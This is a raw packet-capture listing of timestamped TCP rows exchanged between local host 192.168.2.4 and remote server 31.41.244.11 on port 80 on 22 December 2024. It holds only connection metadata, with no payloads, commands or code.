Dec 22, 2024 02:16:14.005227089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.005264997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.005279064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.005305052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.005306005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.005325079 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.005347013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.005363941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.005388021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.005397081 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.005491018 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.006289959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.006372929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.162563086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.162616014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.162652016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.162676096 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.162688017 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.162713051 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.162728071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.162751913 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.162767887 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.162790060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.162791014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.162843943 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.163630009 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.163683891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.163703918 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.163727045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.163753986 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.163800955 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.164542913 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.164594889 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.164611101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.164637089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.164645910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.164695978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.165142059 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.165242910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.165249109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.165287971 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.165303946 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.165339947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.166024923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.166080952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.166112900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.166152000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.166168928 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.166217089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.166889906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.166940928 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.167048931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.167084932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.167104006 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.167128086 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.167798996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.167856932 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.167876005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.167912960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.167927980 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.167958975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.168665886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.168719053 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.168772936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.168808937 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.168828011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.168859005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.169612885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.169668913 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.169670105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.169706106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.169750929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.170454979 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.170562029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.170598030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.170618057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.170641899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.171407938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.171463013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.171499014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.171516895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.171536922 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.172235966 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.172287941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.172333956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.172369003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.172384977 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.173106909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.173162937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.173209906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.173245907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.173299074 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.173989058 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.174089909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.174124956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.174144983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.174168110 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.174887896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.174998999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.175034046 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.175050020 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.175786972 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.175898075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.175904036 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.175935984 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.175946951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.176660061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.176707029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.176772118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.176826954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.176878929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.177546024 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.177599907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.177663088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.177697897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.177750111 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.178452969 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.178579092 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.178613901 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.178657055 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.178673029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.179335117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.179431915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.179466963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.179495096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.179533005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.180238008 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.180303097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.180336952 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.180362940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.180393934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.181098938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.181210995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.181262016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.181267977 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.181988955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.182025909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.182056904 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.182107925 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.182142973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.182200909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.182867050 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.183196068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.183260918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.183260918 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.183295965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.183329105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.184051037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.184111118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.184166908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.184205055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.184262991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.184946060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.185005903 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.185059071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.185096979 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.185156107 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.185832024 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.185933113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.185967922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.185993910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.186026096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.186743021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.186816931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.186830997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.186883926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.186954021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.187613010 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.187717915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.187758923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.187771082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.187808037 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.188498974 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.188611031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.188647985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.188663960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.188693047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.189403057 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.189502001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.189539909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.189551115 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.190021038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.190284014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.190387011 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.190422058 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.190438032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.190458059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.197149038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.197304964 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.197343111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.197397947 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.197432995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.197469950 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.197721958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.198160887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.202042103 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.354618073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.354721069 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.354762077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.354773045 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.354803085 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.354810953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.354847908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.354882956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.354896069 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.355237007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.355582952 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.355653048 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.355691910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.355700016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.355736017 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.356681108 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.356733084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.356774092 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.356779099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.356815100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.357314110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.357415915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.357451916 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.357462883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.357495070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.358207941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.358355045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.358391047 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.358401060 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.358434916 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.359095097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.359186888 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.359222889 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.359235048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.359265089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.359973907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.360089064 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.360125065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.360136986 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.360165119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.360852957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.360959053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.360997915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.361005068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.361041069 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.361923933 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.361963987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.362030983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.362066984 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.362112045 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.362631083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.362675905 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.362746954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.362782955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.362832069 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.363524914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.363569021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.363632917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.363668919 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.363712072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.364415884 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.364516020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.364551067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.364561081 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.364593983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.365287066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.365406036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.365442038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.365453005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.365485907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.366230965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.366313934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.366314888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.366349936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.366384983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.366416931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.367060900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.367180109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.367223978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.367235899 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.367278099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.367969990 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.368069887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.368103981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.368117094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.368144989 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.368844032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.368951082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.368985891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.368997097 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.369029045 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.369744062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.369823933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.369846106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.369882107 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.369910002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.369926929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.370641947 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.370747089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.370783091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.370795965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.370830059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.371850014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.371954918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.371992111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.372004032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.372034073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.372397900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.372490883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.372525930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.372540951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.372566938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.373285055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.373399973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.373435020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.373449087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.373476028 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.374192953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.374475002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.374525070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.374578953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.374614954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.374624968 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.374798059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.375359058 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.375456095 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.375492096 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.375505924 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.375534058 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.376240015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.376353025 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.376388073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.376399994 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.376430988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.377166986 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.377242088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.377276897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.377290964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.377319098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.378025055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.378134966 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.378170013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:14.378181934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.378211021 CET	49765	80	192.168.2.4	31.41.244.11
